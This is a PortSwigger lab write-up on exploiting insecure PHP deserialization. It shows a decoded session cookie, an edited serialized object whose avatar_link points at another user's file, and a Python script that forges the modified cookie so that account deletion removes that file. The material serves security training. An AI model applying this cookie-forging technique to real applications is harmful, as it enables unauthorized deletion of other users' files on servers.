Lab: Using application functionality to exploit insecure deserialization
tags: Portswigger Web Security Academy
Web
- Description: This lab uses a serialization-based session mechanism. A certain feature invokes a dangerous method on data provided in a serialized object.
Goal: To solve the lab, edit the serialized object in the session cookie and use it to delete the morale.txt file from Carlos’s home directory.
You can log in to your own account using the following credentials: wiener:peter
You also have access to a backup account: gregg:rosebud
Recon
Login and Recon: log in as wiener and look at the request sent when you delete an account. The session cookie it carries looks like this:
Session:
Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJzdHB4YXlzZzRtdzJ4MHo5c3h2ajE4N3dmZWEweGY5NSI7czoxMToiYXZhdGFyX2xpbmsiO3M6MTk6InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d
Decoded string (URL-decode, then base64-decode; the result is a PHP serialized object):
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"stpxaysg4mw2x0z9sxvj187wfea0xf95";s:11:"avatar_link";s:19:"users/wiener/avatar";}
Deleting the account removes not only the account itself but also its avatar image, and the path of that image is stored client-side in the avatar_link field of the serialized object:
users/wiener/avatar
What if we change the path that gets deleted? (a guess)
Exp - Change the delete path
Exploit Payload (point avatar_link at the target file; the length prefix must be updated to the new byte length, 23 for /home/carlos/morale.txt, or unserialize() will reject it):
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"stpxaysg4mw2x0z9sxvj187wfea0xf95";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
Base64-encode and URL-encode this payload, replace the session cookie with it, and trigger account deletion as wiener. The deletion routine removes whatever file avatar_link points to, so Carlos's morale.txt is deleted along with the wiener account, which is why the lab provides the backup account gregg:rosebud.
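The recon and exploit steps above, as an added example (my own code, not part of the lab or the original notes): it decodes the captured session cookie, rewrites the avatar_link property while recomputing the PHP string-length prefix, checks that every length prefix in the result is consistent, and re-encodes the object into cookie form. It assumes only the cookie shown above and the PHP serialization format; the function names are mine.

```python
import base64
import re
from urllib.parse import quote, unquote

# Session cookie captured during recon (copied from the lab notes above).
SESSION_COOKIE = (
    "Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtz"
    "OjMyOiJzdHB4YXlzZzRtdzJ4MHo5c3h2ajE4N3dmZWEweGY5NSI7czoxMToiYXZhdGFyX2xpbmsiO3M6MTk6"
    "InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d"
)


def decode_cookie(cookie: str) -> bytes:
    """URL-decode, then base64-decode, the session cookie into the raw PHP serialized object."""
    return base64.b64decode(unquote(cookie))


def encode_cookie(serialized: bytes) -> str:
    """Inverse of decode_cookie: base64-encode, then URL-encode so the '=' padding survives in a cookie."""
    return quote(base64.b64encode(serialized).decode(), safe="")


# Start of a PHP string token: s:<byte length>:"
_PHP_STRING = re.compile(rb's:(\d+):"')


def string_lengths_consistent(serialized: bytes) -> bool:
    """Walk every s:<len>:"..." token and confirm the declared byte length lands exactly on the
    closing '";'. A hand-edited payload with a stale length is the usual reason unserialize() fails."""
    pos = 0
    while True:
        m = _PHP_STRING.search(serialized, pos)
        if m is None:
            return True
        value_end = m.end() + int(m.group(1))
        if serialized[value_end:value_end + 2] != b'";':
            return False
        pos = value_end + 2


def set_string_field(serialized: bytes, key: str, new_value: str) -> bytes:
    """Replace the value of one string property and recompute its byte-length prefix."""
    key_b = key.encode()
    # Matches the key token followed by the start of its value token, e.g. s:11:"avatar_link";s:19:"
    pattern = re.compile(rb's:%d:"%s";s:(\d+):"' % (len(key_b), re.escape(key_b)))
    m = pattern.search(serialized)
    if m is None:
        raise KeyError(f"no string property named {key!r}")
    old_len = int(m.group(1))
    value_end = m.end() + old_len
    if serialized[value_end:value_end + 2] != b'";':
        raise ValueError(f"declared length of {key!r} does not match its value")
    new_bytes = new_value.encode()
    # Splice in "<new length>:"<new value>" and keep everything after the old value's closing quote.
    return (serialized[:m.start(1)]
            + str(len(new_bytes)).encode() + b':"' + new_bytes
            + serialized[value_end:])


def build_exploit_cookie(cookie: str, target_path: str) -> str:
    """Recon and exploit in one step: decode the session, point avatar_link at the target, re-encode."""
    obj = decode_cookie(cookie)
    payload = set_string_field(obj, "avatar_link", target_path)
    if not string_lengths_consistent(payload):
        raise ValueError("payload has an inconsistent string length prefix")
    return encode_cookie(payload)


if __name__ == "__main__":
    original = decode_cookie(SESSION_COOKIE)
    print("decoded:", original.decode())
    payload = set_string_field(original, "avatar_link", "/home/carlos/morale.txt")
    print("payload:", payload.decode())
    print("cookie: ", build_exploit_cookie(SESSION_COOKIE, "/home/carlos/morale.txt"))
```

Paste the printed cookie value over the session cookie in the delete-account request. The length check is the part worth keeping around: PHP counts bytes, not characters, and a mismatched prefix makes unserialize() return false rather than an obvious error.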
:::spoiler Success Screenshot
:::